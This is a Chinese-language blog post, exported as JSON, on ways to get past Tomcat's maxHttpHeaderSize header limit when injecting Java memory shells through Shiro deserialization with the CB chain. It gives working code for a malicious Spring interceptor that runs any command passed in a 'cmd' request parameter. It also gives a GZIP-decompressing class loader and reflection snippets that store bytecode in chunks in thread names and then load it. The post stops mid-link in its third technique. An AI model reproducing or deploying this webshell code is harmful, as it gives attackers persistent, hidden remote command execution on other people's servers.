{"id":30,"date":"2025-06-18T23:20:00","date_gmt":"2025-06-18T15:20:00","guid":{"rendered":"http:\/\/byname6.cn\/?p=30"},"modified":"2025-06-30T19:38:09","modified_gmt":"2025-06-30T11:38:09","slug":"%e5%86%85%e5%ad%98%e9%a9%ac%e7%bb%95%e8%bf%87maxhttpheadersize%e9%99%90%e5%88%b6","status":"publish","type":"post","link":"http:\/\/byname6.cn\/index.php\/2025\/06\/18\/%e5%86%85%e5%ad%98%e9%a9%ac%e7%bb%95%e8%bf%87maxhttpheadersize%e9%99%90%e5%88%b6\/","title":{"rendered":"\u5185\u5b58\u9a6c\u7ed5\u8fc7maxHttpHeaderSize\u9650\u5236"},"content":{"rendered":"\n<p>\u5728\u5229\u7528\u53cd\u5e8f\u5217\u5316\u6ce8\u5165\u5185\u5b58\u9a6c\u7684\u5b9e\u6218\u4e2d\uff0c\u901a\u5e38\u9047\u5230\u73af\u5883\u90fd\u662f\u5efa\u7acb\u5728\u4ee5<strong>Tomcat<\/strong>\u4e3a\u5bb9\u5668\u7684\u73af\u5883\u4e2d\u7684\u3002<\/p>\n\n\n\n<p>\u800cTomcat\u5177\u6709\u4e00\u4e2a<strong>maxHttpHeaderSize<\/strong>\u53c2\u6570\uff1a<strong>\u9650\u5236\u8bf7\u6c42\u5305\u8bf7\u6c42\u5934\u52a0\u8d77\u6765\u7684\u5b57\u7b26\u6570\u603b\u548c\u957f\u5ea6\uff0c\u5305\u62ecGET \/XXX?a=xxx\u3002\u5982\u679c\u8d85\u8fc7\u8fd9\u4e2a\u503c\u5c31\u8fd4\u56de400\u3002<\/strong><\/p>\n\n\n\n<p>\u5728Tomcat\u7684<code>Server.xml<\/code>\u6216\u5728Spring\u7684<code>application.properties<\/code>\u3001<code>application.xml<\/code>\u4e2d\u53ef\u4ee5\u4fee\u6539\u8fd9\u4e2a\u9650\u5236\u7684\u503c\u3002\u5982\u679c\u4e0d\u8fdb\u884c\u4fee\u6539\uff0c\u9ed8\u8ba4\u4e3a<strong>8KB(8192\u4e2aASCII\u5b57\u7b26)<\/strong>\u3002<\/p>\n\n\n\n<p>\u4ee5\u5bf9\u4e00\u4e2a\u5b58\u5728shiro\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684Spring\u7ad9\u70b9\u6ce8\u5165\u5185\u5b58\u9a6c\u4e3a\u4f8b\uff0c\u7528CB\u94fe\u6ce8\u5165\u4e00\u4e2a\u6700\u7b80\u5355\u7684<strong><code>Springboot Interceptor<\/code><\/strong>\u5185\u5b58\u9a6c\u7684\u5e8f\u5217\u5316\u6d41\u7ecf\u8fc7Base64\u7f16\u7801\u540e\u5927\u6982\u4e3a<strong>4000<\/strong>\u4e2a\u5b57\u7b26\u3002<\/p>\n\n\n\n<p>\u4f46\u6709\u65f6\u5185\u5b58\u9a6c\u7684\u540e\u95e8\u903b\u8f91\u4e0d\u4ec5\u4ec5\u53ea\u6709\u4e00\u4e2a\u7b80\u5355\u7684\u6267\u884c\u547d\u4ee4\u83b7\u53d6\u56de\u663e\uff0c\u53ef\u80fd\u50cf\u51b0\u874e\u3001\u54e5\u65af\u62c9\uff0c\u5185\u7f6e\u8fd8\u5199\u4e86\u5de5\u5177\u7c7b\uff0c\u5bf9shell\u5bc6\u7801\u7684ASE\u52a0\u5bc6\uff1b\u6216\u8005\u50cf\u662fLINUX\u4e0b\u7684\u65e0\u6587\u4ef6Agent\u5185\u5b58\u9a6c\uff0c\u5b58\u653e\u4e86\u673a\u5668\u7801\u7f16\u8bd1\u540e\u7684\u5b57\u8282\u6570\u7ec4&#8230;\u8bf8\u5982\u6b64\u7c7b\uff0c\u6709\u53ef\u80fd\u4f1a\u5728\u5b9e\u6218\u4e2d\u5bfc\u81f4\u5e8f\u5217\u5316\u6ce8\u5165\u5185\u5b58\u9a6c\u7684payload\u957f\u5ea6\u8fc7\u957f\u5bfc\u81f4400\u62a5\u9519\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u4e5f\u505a\u4e00\u70b9\u5bf9\u4e8e<strong>\u5185\u5b58\u9a6c\u56de\u663e<\/strong>\u9650\u5236header\u957f\u5ea6\u7684\u8865\u5145\uff0c\u6bd4\u5982\u80fd\u4f20\u5165\u7684\u662fJSP\u5185\u5b58\u9a6c\uff0c\u4f46\u56de\u663e\u957f\u5ea6\u8d85\u51fa<strong><code>maxHttpHeaderSize<\/code><\/strong>\u5bfc\u81f4\u7684\u56de\u663e\u5931\u8d25\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u6ce8\u5165\u5185\u5b58\u9a6c\u53d7\u9650<\/h1>\n\n\n\n<p>\u603b\u7ed3\u51e0\u79cd\u5e38\u89c1\u7684\u7ed5\u8fc7\u957f\u5ea6\u9650\u5236\u7684\u601d\u8def\uff1a<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u538b\u7f29class\u5b57\u8282\u7801\u5b57\u7b26<\/h2>\n\n\n\n<p>\u538b\u7f29\u7b97\u6cd5\u662f\u5bf9\u4e00\u4e2a\u5185\u5bb9\u5229\u7528\u5bc6\u7801\u5b66\u7b97\u6cd5\u8fdb\u884c\u6807\u8bb0\u5e76\u5220\u9664\u201c\u71b5\u4f59\u201d\uff0c\u6700\u540e\u8fd8\u539f\u65b9\u6cd5\u5bf9\u538b\u7f29\u7ed3\u679c\u6839\u636e\u6807\u8bb0\u5c06\u5176\u539f\u5c01\u4e0d\u52a8\u5730\u8fd8\u539f\u3002<\/p>\n\n\n\n<p>\u6211\u4eec\u77e5\u9053\uff0cJava\u5bf9\u4e8e\u4e00\u4e2a\u7c7b\u7684\u52a0\u8f7d\uff0c\u672c\u8d28\u4e0a\u5c31\u662f\u9700\u8981\u83b7\u53d6\u7c7b\u7684\u5b57\u8282\u7801\u5e76\u8fdb\u884c\u64cd\u4f5c\uff0c\u4e43\u81f3\u521d\u59cb\u5316\u3001\u5b9e\u4f8b\u5316\uff0c\u7c7b\u521d\u59cb\u5316\u7684\u8fc7\u7a0b\u4e2d\u89e6\u53d1static\u4ee3\u7801\u5757\uff0c\u5b9e\u4f8b\u5316\u7684\u65f6\u5019\u89e6\u53d1\u6784\u9020\u51fd\u6570\u3002\u7ed3\u5408\u538b\u7f29\u7b97\u6cd5\uff0c\u6211\u4eec\u80fd\u591f\u60f3\u5230\u8fd9\u6837\u4e00\u79cd\u51cf\u5c11payload\u5b57\u7b26\u6570\u91cf\u7684\u5199\u6cd5\uff1a<\/p>\n\n\n\n<p>\u5c31\u4ee5<strong><code>Spring-boot-2.7.0<\/code><\/strong>\u4e0b\u7684<strong><code>Springboot Interceptor\u5185\u5b58\u9a6c<\/code><\/strong>\u4e3a\u4f8b\uff0c\u7b80\u5355\u56de\u987e\u4e00\u4e0b\u901a\u8fc7CB\u94fe\u6253\u5165\u7684\u62e6\u622a\u5668\u5185\u5b58\u9a6c\u6d41\u7a0b\uff1a<\/p>\n\n\n\n<p>\u666e\u901a\u7684\u53cd\u5e8f\u5217\u5316\u94fe\u5c31\u662f\u901a\u8fc7\u83b7\u53d6\u6076\u610fInterceptor\u5b58\u50a8\u5230TemplateImpl\u4e2d\uff0c<strong>\u53cd\u5e8f\u5217\u5316\u65f6TemplateImpl\u5c31\u4f1a\u52a0\u8f7d\u8fd9\u4e2a\u6076\u610f\u7684Interceptor\uff0c\u89e6\u53d1\u5176\u9759\u6001\u4ee3\u7801\u5757<\/strong>\uff1b\u8fd9\u4e2a\u6076\u610fInterceptor\u7684\u9759\u6001\u4ee3\u7801\u5757\u91cc\u5c31\u5b9e\u73b0\u4e86\u5c06\u5176\u81ea\u8eab\u5b9e\u4f8b\u5316\u5bf9\u8c61\u52a8\u6001\u6ce8\u518c\u5230\u8fd0\u884c\u670d\u52a1\u7684Spring\u5b9e\u4f8b\u3002<\/p>\n\n\n\n<p>\u6267\u884c\u7684\u8c03\u7528\u94fe\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">TemplateImpl\u7c7b\u52a0\u8f7d\u89e6\u53d1\u6076\u610finterceptor\u7684\u9759\u6001\u4ee3\u7801\u5757 -&gt;<br>interceptor\u7684\u9759\u6001\u4ee3\u7801\u5757\u5b9e\u73b0\u52a8\u6001\u6ce8\u518cinterceptor\u7684\u5bf9\u8c61\u5230Spring\u4e2d\uff0c\u5b8c\u6210\u5185\u5b58\u9a6c\u6ce8\u5165<\/pre>\n\n\n\n<p>\u80fd\u770b\u5f97\u51fa\u6765\u6ce8\u518c\u548c\u5b9e\u73b0\u5185\u5b58\u9a6c\u7684\u903b\u8f91\u90fd\u96c6\u4e2d\u5728\u8fd9\u4e2aInterceptor\u7c7b\u7684static\u9759\u6001\u4ee3\u7801\u5757\u4e2d\uff0c\u90a3\u6211\u4eec\u53ef\u4ee5<strong>\u5c06\u8fd9\u4e2aInterceptor\u7684\u5b57\u8282\u7801\u5229\u7528\u7b97\u6cd5\u8fdb\u884c\u538b\u7f29\u3001base64\u7f16\u7801\uff0c\u5f97\u5230\u4e00\u4e32\u538b\u7f29\u540e\u7684\u5b57\u7b26\u4e32\uff1b\u518d\u91cd\u65b0\u5199\u4e00\u4e2a\u7c7bevil_class\uff0c\u5176\u9759\u6001\u4ee3\u7801\u5757\u4e2d\u4e00\u4e2a\u53d8\u91cf\u50a8\u5b58\u8fd9\u4e32\u538b\u7f29\u3001\u7f16\u7801\u540e\u7684\u5b57\u7b26\u4e32\uff0c\u540e\u7eed\u903b\u8f91\u53ea\u7528\u5bf9\u5176\u89e3\u7801\u3001\u89e3\u538b\u7f29\u5f97\u5230\u539f\u59cb\u7684\u5b57\u8282\u7801\uff0c\u53cd\u5c04\u8c03\u7528defineClass\u8fdb\u884c\u7c7b\u52a0\u8f7d\uff1b\u6700\u540e\u53ea\u9700\u5c06evil_class\u7684\u5b57\u8282\u7801\u4f20\u5165CB\u94fe\u4e2d\u7684TemplateImpl\u3002<\/strong><\/p>\n\n\n\n<p>\u6574\u4f53\u6267\u884c\u7684\u8c03\u7528\u94fe\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">TemplateImpl\u7c7b\u52a0\u8f7d\u89e6\u53d1evil_class\u7684\u9759\u6001\u4ee3\u7801\u5757 -&gt; <br>evil_class\u5bf9\u89e3\u538b\u7f29\u5f97\u5230\u7684interceptor\u5b57\u8282\u7801\u8fdb\u884c\u7c7b\u52a0\u8f7d\uff0c\u89e6\u53d1interceptor\u7684\u9759\u6001\u4ee3\u7801\u5757 -&gt; <br>interceptor\u7684\u9759\u6001\u4ee3\u7801\u5757\u5b9e\u73b0\u52a8\u6001\u6ce8\u518cinterceptor\u7684\u5bf9\u8c61\u5230Spring\u4e2d\uff0c\u5b8c\u6210\u5185\u5b58\u9a6c\u6ce8\u5165<\/pre>\n\n\n\n<p>\u503c\u5f97\u4e00\u63d0\u7684\u662f\uff0c\u56e0\u4e3a\u6d89\u53ca\u5230\u5bf9\u5b57\u8282\u7801\u7684\u8bfb\u53d6\uff0c\u4e5f\u5c31\u5148\u9700\u8981\u5bf9.java\u6587\u4ef6\u7f16\u8bd1\u4e3a.class\u6587\u4ef6\uff1b\u7531\u4e8e\u5f15\u7528\u4e86\u7b2c\u4e09\u65b9\u4f9d\u8d56\uff0c\u76f4\u63a5javac\u7f16\u8bd1\u4e0d\u65b9\u4fbf(\u8981\u6307\u5b9ajar\u5305)\uff0c\u800c\u76f4\u63a5\u7528\u7b2c\u4e09\u65b9\u4f9d\u8d56\u7ba1\u7406\u5982maven\u7f16\u8bd1\u4f1a\u4ea7\u751f\u5927\u91cf\u8c03\u8bd5\u4fe1\u606f\u7b49\u5197\u4f59\u5b57\u7b26\u589e\u52a0payload\u7684\u957f\u5ea6\u3002\u6240\u4ee5\u9700\u8981\u5148\u5728pom.xml\u7684build\u6a21\u5757\u52a0\u5165<strong><code>&lt;arg&gt;-g:none&lt;\/arg&gt;<\/code><\/strong>\u4f7f\u5f97maven\u4e0d\u8f93\u51fa\u591a\u4f59\u4fe1\u606f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;build&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp;&lt;plugins&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;plugin&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;groupId&gt;org.apache.maven.plugins&lt;\/groupId&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;artifactId&gt;maven-compiler-plugin&lt;\/artifactId&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;configuration&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;source&gt;8&lt;\/source&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;target&gt;8&lt;\/target&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;compilerArgs&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;arg&gt;-g:none&lt;\/arg&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;\/compilerArgs&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;\/configuration&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;\/plugin&gt;<br> &nbsp; &nbsp; &nbsp; &nbsp;&lt;\/plugins&gt;<br> &nbsp;&lt;\/build&gt;<\/pre>\n\n\n\n<p>Java\u6807\u51c6\u5e93\u76f4\u63a5\u5bf9\u5b57\u8282\u7801\u538b\u7f29\u7684\u5e38\u89c1\u7b97\u6cd5\uff1aGZIP \/ DEFLATE<\/p>\n\n\n\n<p>\u7ecf\u8fc7\u6d4b\u8bd5\u4e24\u8005\u538b\u7f29\u6bd4\u4f8b\u90fd\u5dee\u4e0d\u591a\uff0c\u5bf9\u4e8e\u4e00\u4e2a\u7b80\u5355\u7684Intecptor\u538b\u7f29\u7387\u80fd\u5927\u6982<strong>%60<\/strong>\uff083836\u538b\u7f29\u52301696\u5b57\u8282\uff09\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u7ed9\u51fa\u538b\u7f29\u5b57\u7b26\u5230\u8f93\u51faCB\u94fe\u7684\u6574\u4e2ademo\uff1a<\/p>\n\n\n\n<p><strong>\u6076\u610finterceptor\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public class evil_interceptor extends AbstractTranslet implements HandlerInterceptor{<br> &nbsp; &nbsp;static<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;WebApplicationContext context = RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;org.springframework.web.servlet.handler.AbstractHandlerMapping abstractHandlerMapping = (org.springframework.web.servlet.handler.AbstractHandlerMapping)context.getBean(RequestMappingHandlerMapping.class);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField(\"adaptedInterceptors\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;field.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.util.ArrayList&lt;Object&gt; adaptedInterceptors = (java.util.ArrayList&lt;Object&gt;)field.get(abstractHandlerMapping);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;evil_inceptor evil_Interceptor=new evil_inceptor();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;adaptedInterceptors.add(evil_Interceptor);<br> &nbsp; &nbsp; &nbsp;  } catch (Exception e) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;throw new RuntimeException(e);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {<br> &nbsp; &nbsp; &nbsp; &nbsp;String cmd = request.getParameter(\"cmd\");<br> &nbsp; &nbsp; &nbsp; &nbsp;if (cmd != null) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Runtime.getRuntime().exec(cmd);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (IOException e) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;e.printStackTrace();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (NullPointerException n) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;n.printStackTrace();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;return true;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp;return false;<br> &nbsp;  }<br> &nbsp; &nbsp;public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {<br> &nbsp;  }<br> &nbsp; &nbsp;public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {<br> &nbsp;  }<br>}<\/pre>\n\n\n\n<p><strong>\u8f93\u51fainterceptor\u538b\u7f29\u5b57\u7b26\u4e32\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp; &nbsp; ClassPool pool = ClassPool.getDefault();<br> &nbsp; &nbsp; CtClass evil_interceptor = pool.get(\"evil_interceptor\");<br> &nbsp; &nbsp; byte[] compressedBytes = evil_interceptor.toBytecode();<br> &nbsp; &nbsp; String compressedBase64 = Base64.getEncoder().encodeToString(compressedBytes);<br> &nbsp; &nbsp; System.out.println(\"\u6700\u7ec8\u53d1\u9001\u7684Base64\u5b57\u7b26\u4e32: \" + compressedBase64);<\/pre>\n\n\n\n<p><strong>evil_class\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public class evil_class{<br> &nbsp;static{<br> &nbsp; &nbsp;        String b64 = \"xxx\";<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;byte[] compressedBytes = Base64.getDecoder().decode(b64);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ByteArrayInputStream byteStream = new ByteArrayInputStream(compressedBytes);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ByteArrayOutputStream outStream = new ByteArrayOutputStream();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try (GZIPInputStream gzipStream = new GZIPInputStream(byteStream)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;byte[] buffer = new byte[1024];<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;int len;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;while ((len = gzipStream.read(buffer)) != -1) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;outStream.write(buffer, 0, len);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (IOException ex) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;throw new RuntimeException(ex);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  } catch (Exception e) {<br> &nbsp; &nbsp; &nbsp;  }<br>  }<br>}<\/pre>\n\n\n\n<p><strong>CB\u94fe\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp; &nbsp; &nbsp; &nbsp;\/\/....<br> &nbsp; &nbsp; &nbsp; &nbsp;Field _name = tmplClass.getDeclaredField(\"_name\");<br> &nbsp; &nbsp; &nbsp; &nbsp;_name.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp;_name.set(tmpl, \"evil_class\"); &nbsp;\/\/.....\u83b7\u53d6evil_class........................<br> &nbsp; &nbsp; &nbsp; &nbsp;\/\/....<\/pre>\n\n\n\n<p><strong>\u4f18\u70b9\uff1a<\/strong><\/p>\n\n\n\n<p>\u8fd9\u4e2a\u65b9\u6cd5\u76f8\u5f53\u4e8e\u4e00\u4e2a\u6280\u5de7\uff0c\u53ef\u4ee5\u548c\u5176\u5b83\u65b9\u6cd5\u6df7\u642d\u3001\u6216\u8005payload\u504f\u957f\u7684\u60c5\u51b5\u4e0b\u6709\u6548\u7f29\u77ed\u3002<\/p>\n\n\n\n<p><strong>\u7f3a\u70b9\uff1a<\/strong><\/p>\n\n\n\n<p>\u8fd9\u4e2a\u65b9\u6cd5\u4ec5\u5bf9\u4e8e<strong>\u66f4\u957f\u7684payload\u6709\u663e\u8457\u6548\u679c<\/strong>\uff0c\u5982\u679c\u5bf9\u7b80\u5355\u7684\u5185\u5b58\u9a6c\u53cd\u5e8f\u5217\u5316payload\u4f7f\u7528\u53cd\u800c\u9002\u5f97\u5176\u53cd\uff1a\u56e0\u4e3a\u5982\u679c\u62e6\u622a\u5668\u7684\u5b57\u8282\u7801\u672c\u6765\u5c31\u77ed\uff0c\u538b\u7f29\u4e5f\u51cf\u5c11\u4e0d\u4e86\u592a\u591a\uff0c\u53cd\u800c\u5728evil_class\u4e2d\u989d\u5916\u5199\u5165\u7684\u89e3\u7801\u89e3\u538b\u7f29\uff0c\u7c7b\u52a0\u8f7d\u903b\u8f91\u7684\u5b57\u8282\u7801\u957f\u5ea6<strong>\uff08\u5927\u69821300\u5b57\u8282\uff09<\/strong>\u90fd\u6bd4\u538b\u7f29\u7701\u4e0b\u6765\u7684\u591a\u3002<\/p>\n\n\n\n<p>\u8fd9\u79cd\u7f29\u51cfpayload\u7684\u601d\u60f3\u901a\u5e38\u662f\u5728\u5982Spel\u6ce8\u5165\u8fd9\u79cd\u8868\u8fbe\u5f0f\u6ce8\u5165\u66f4\u6613\u4e8e\u5229\u7528\uff0c\u59822024-36401<a href=\"https:\/\/medium.com\/@numencyberlabs\/cve-2024-36401-memory-shell-exploit-for-jdk-11-22-1a40162494c9\">https:\/\/medium.com\/@numencyberlabs\/cve-2024-36401-memory-shell-exploit-for-jdk-11-22-1a40162494c9<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u591a\u6b21\u53d1\u5305\u5c06\u7f16\u7801\u5206\u5757\u5b58\u5165\u5168\u5c40\u53d8\u91cf<\/h2>\n\n\n\n<p>\u4e2a\u4eba\u89c9\u5f97\u8fd9\u662f\u6ce8\u5165\u65f6\u7528\u4e8e\u7ed5\u8fc7\u9650\u5236\u6700\u597d\u5229\u7528(\u53d1\u5305\u65f6payload\u957f\u5ea6\u6700\u5c0f)\u7684\u601d\u8def\uff0c\u8fd9\u4e2a\u65b9\u6cd5\u9996\u5148\u5728\u8fd9\u7bc7\u535a\u5ba2\u4e2d\u63d0\u5230\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/y4tacker.github.io\/2022\/04\/14\/year\/2022\/4\/%E6%B5%85%E8%B0%88Shiro550%E5%8F%97Tomcat-Header%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E5%BD%B1%E5%93%8D%E7%AA%81%E7%A0%B4\n<\/div><\/figure>\n\n\n\n<p>\u601d\u60f3\u5c31\u662f\u5bfb\u627e\u4e00\u4e2a\u80fd\u591f\u50a8\u5b58\u591a\u6b21\u53d1\u5305\u7684\u53c2\u6570\u7684\u5168\u5c40\u5bf9\u8c61\uff0c\u5b8c\u6574\u5b58\u5165\u5b57\u8282\u7801\u7684\u7f16\u7801\u503c\u540e\uff0c\u518d\u53d1\u4e00\u4e2a\u5305\u89e3\u7801\u3001\u7c7b\u52a0\u8f7d\u8fd9\u4e2a\u5b57\u8282\u7801\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u627e\u5230\u7684\u662fThread\u5bf9\u8c61\u7684name\u5c5e\u6027\uff0c\u4e5f\u5c31\u662f\u7ebf\u7a0b\u540d\u3002\u8fd9\u6837\u7684\u80fd\u627e\u5230\u7684\u5c5e\u6027\u6709\u5f88\u591a\u79cd\uff0cThreadLocal\u3001ServletContext().setAttribute()\u3001\u5355\u72ec\u5f00\u4e00\u4e2aThread\u7f13\u5b58buffer\u3001\u6587\u672b\u5728\u5df2\u7ecf\u6ce8\u5165\u5185\u5b58\u9a6c\u7684\u524d\u63d0\u4e0b\u63d0\u5230\u7684final\u53d8\u91cf\u7b49\u7b49\u90fd\u80fd\u8fbe\u5230\u7c7b\u4f3c\u7684\u6548\u679c\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u4ee5\u6587\u4e2d\u7684payload\u4e3a\u4f8b\uff1a<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b21\u6267\u884c\u5148\u989d\u5916\u8bbe\u7f6e\u4e00\u4e2aThread\u8fdb\u884c\u5b58\u5165\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Thread.currentThread().setName(\u201ctest\u201d);<\/pre>\n\n\n\n<p>\u4e2d\u95f4\u5bf9\u5b57\u8282\u7801base64\u7f16\u7801\u5206\u5757\u4f20\u8f93<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">try {<br> &nbsp;ThreadGroup a = Thread.currentThread().getThreadGroup();<br> &nbsp;java.lang.reflect.Field v2 = a.getClass().getDeclaredField(\"threads\");<br> &nbsp;v2.setAccessible(true);<br> &nbsp;Thread[] o = (Thread[]) v2.get(a);<br> &nbsp;for(int i = 0; i &lt; o.length; ++i) {Thread z = o[i];if (z.getName().contains(\"test\")){z.setName(z.getName()+\"\u5206\u6bb5\u4f20\u8f93\u7684\u5b57\u8282\u7801base64\u7f16\u7801\");<br> }}}catch (Exception e){}<\/pre>\n\n\n\n<p>\u6700\u540e\u83b7\u53d6\u8fd9\u4e2aThread name\uff0c\u5c06\u5176\u4e2d\u7684\u503c\u8fdb\u884c\u5904\u7406\u5e76\u7c7b\u52a0\u8f7d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">try {ThreadGroup a = Thread.currentThread().getThreadGroup();<br>java.lang.reflect.Field v2 = a.getClass().getDeclaredField(\"threads\");<br>v2.setAccessible(true);<br>Thread[] o = (Thread[]) v2.get(a);for(int i = 0; i &lt; o.length; ++i) (<br>Thread z = o[i];<br>if (z.getName().contains(\"test\")){<br> &nbsp; byte[] x = org.apache.shiro.codec.Base64.decode(z.getName().replaceAll(\"test\", \"\"));<br> &nbsp; java.lang.reflect.Method defineClassMethod=ClassLoader.class.getDeclaredMethod(\"defineClass\",byte[].class,int.class, int.class);<br> defineClassMethod.setAccessible(true);<br> ((Class)defineClassMethod.invoke(a.class.getClassLoader(), x, 0, x.length)).newInstance();<br>}}}catch (Exception e){}<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u4ecePOST\u8bf7\u6c42\u4f53\u4e2d\u52a0\u8f7d\u5b57\u8282\u7801<\/h2>\n\n\n\n<p>\u6587\u9996\u63d0\u5230\u8fc7\uff0cmaxHttpHeaderSize\u662f\u9488\u5bf9\u4e8e\u8bf7\u6c42\u5934\u7684\u957f\u5ea6\uff0c\u800cPOST\u8bf7\u6c42\u4f53\u4e0d\u5c5e\u4e8e\u8bf7\u6c42\u5934\u3002\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u5728\u9759\u6001\u4ee3\u7801\u5757\u4e2d\u5199\u4eceRequest\u53d8\u91cf\u4e2d\u83b7\u53d6POST\u53c2\u6570\u7684\u503c\uff0c\u5b9e\u9645\u4e0a\u5c31\u662f\u6076\u610finterceptor\u7684\u5b57\u8282\u7801\u7f16\u7801\u6d41(\u76f4\u63a5<strong><code>getParameter<\/code><\/strong>)\uff0c\u5c06\u5176\u89e3\u7801\u540e\u83b7\u53d6\u5b57\u8282\u7801\uff0c\u53cd\u5c04\u8c03\u7528defineClass\u8fdb\u884c\u7c7b\u52a0\u8f7d\u3002<\/p>\n\n\n\n<p>\u5bf9\u4e8e\u8fd9\u79cd\u65b9\u6cd5Tomcat\u548cSpringboot\u7684\u5b9e\u73b0\u7565\u6709\u4e0d\u540c\uff0c\u4e3b\u8981\u533a\u522b\u5728\u4e8erequest\u5bf9\u8c61\u7684\u83b7\u53d6\uff0c\u8be6\u60c5\u53ef\u4ee5\u770b<a 